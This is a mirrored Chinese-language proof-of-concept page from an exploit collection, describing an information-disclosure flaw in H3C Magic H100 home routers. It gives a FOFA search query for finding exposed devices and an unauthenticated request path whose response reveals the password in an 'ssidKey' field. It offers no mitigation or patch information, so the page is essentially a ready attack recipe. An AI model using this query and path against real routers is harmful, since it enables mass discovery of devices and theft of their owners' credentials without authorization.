mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-06 10:56:07 +00:00
27 lines
991 B
Markdown
27 lines
991 B
Markdown
|
|
# H3C-H100路由器-信息泄露漏洞
|
||
|
|
|
||
|
|
# 一、漏洞简介
|
||
|
|
H3C Magic H100是新华三技术有限公司特别设计的全千兆家庭智能中枢。H3C-H100路由器信息泄露漏洞,可泄露用户泄露密码
|
||
|
|
|
||
|
|
# 二、影响版本
|
||
|
|
+ H3C多系列路由器
|
||
|
|
|
||
|
|
# 三、资产测绘
|
||
|
|
+ fofa`body="/grwizard/h3c.ico"`
|
||
|
|
+ 登录页面
|
||
|
|
|
||
|
|
# 四、漏洞复现
|
||
|
|
```java
|
||
|
|
/h3c/local/ssidName
|
||
|
|
```
|
||
|
|
|
||
|
|
<font style="color:rgba(0, 0, 0, 0.9);">密码就在ssidKey字段</font>
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
> 更新: 2024-04-22 13:29:11
|
||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ddar0wbuli2xp2n8>
|